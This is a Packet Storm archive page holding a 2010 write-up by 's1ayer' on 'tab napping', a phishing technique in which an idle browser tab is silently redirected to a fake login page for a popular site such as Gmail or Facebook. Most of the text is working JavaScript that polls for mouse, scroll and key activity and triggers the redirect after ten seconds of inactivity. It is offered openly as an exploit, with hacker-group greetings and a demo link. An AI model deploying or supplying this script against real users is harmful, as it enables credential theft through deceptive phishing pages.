exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Advanced Phishing Technique - Tab Napping

Advanced Phishing Technique - Tab Napping
Posted Jun 23, 2010
Authored by s1ayer

Whitepaper called Advanced Phishing Technique - Tab Napping.

tags | paper
SHA-256 | d06386e16ae9ab8ddbc27bcad04449822f99b168bc931437966e254d9ee6a09b

Advanced Phishing Technique - Tab Napping

Change Mirror Download
# Exploit Title: ADVANCE PHISHING TECHNIQUE:TAB NAPPING
================================================================

=======================================================

# Author: s1ayer
(s1ayer.icw@gmail.com)
============================================================
GREETZ: Lord Crusader,sai,sm4rt,b0nd,jappy,Mr.XXXX and all ICW, Andhrahackers member, and all Indians Out there.
Special Greetz:eberly bro.
Website:www.andhrahackers.com
http://security-informatica.blogspot.com
============================================================
We all are familiar with the technique of phishing, tab-napping is the advanced form of phishing is out in the market,
in which when u open any genuine page say the page of any legitimate website like any shop,etc... and if you dont use that
page or in short if that page is kept idle for few seconds because of many reasons like we start browsing other site,
attending phone calls etc, then malicious page automatically gets redirected to phished page or duplicate page of popular sites
like gmail,orkut,facebook,yahoo,etc... which we didnt notice, coz.. we never opened that page, so it looks kinda of genuine page.
=================================================================================================================================
Method:
How this is done:
It is done by checking wether your page is idle or not, if it is idle or not used for some particular time period
then it gets redirected:
Things to be done:
1.check for mouse movement
2.check for scroll bar movement
3.check for keystrokes

If any of the above event is not triggered till few seconds , this means user is not using that tab, either is off from system
or using other tab, so if these conditions are met, then we redirect it to our phished page, which user thinks it to be genuine
page.
===================================================================================================================
Code:
<script type="text/javascript">
var xScroll, yScroll, timerPoll, timerRedirect, timerClock;

function initRedirect(){
if (typeof document.body.scrollTop != "undefined"){ //IE,NS7,Moz
xScroll = document.body.scrollLeft;
yScroll = document.body.scrollTop;

clearInterval(timerPoll); //stop polling scroll move
clearInterval(timerRedirect); //stop timed redirect

timerPoll = setInterval("pollActivity()",1); //poll scrolling
timerRedirect = setInterval("location.href='http://www.gmail.com'",10000); //set timed redirect


}
else if (typeof window.pageYOffset != "undefined"){ //other browsers that support pageYOffset/pageXOffset instead
xScroll = window.pageXOffset;
yScroll = window.pageYOffset;

clearInterval(timerPoll); //stop polling scroll move
clearInterval(timerRedirect); //stop timed redirect

timerPoll = setInterval("pollActivity()",1); //poll scrolling
timerRedirect = setInterval("location.href='http://www.gmail.com'",10000); //set timed redirect


}
//else do nothing
}

function pollActivity(){
if ((typeof document.body.scrollTop != "undefined" && (xScroll!=document.body.scrollLeft || yScroll!=document.body.scrollTop)) //IE/NS7/Moz
||
(typeof window.pageYOffset != "undefined" && (xScroll!=window.pageXOffset || yScroll!=window.pageYOffset))) { //other browsers
initRedirect(); //reset polling scroll position
}
}

document.onmousemove=initRedirect;
document.onclick=initRedirect;
document.onkeydown=initRedirect;
window.onload=initRedirect;
window.onresize=initRedirect;
</script>
================================================================
demo:http://slayericw.zxq.net/tabnappingdemo.html
================================================================
Silence is not our weakness, its just we dont want to waste our time..........................................................
ITs my way of explanation

JAI MATA DI

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    16 Files
  • 26
    Apr 26th
    14 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    20 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close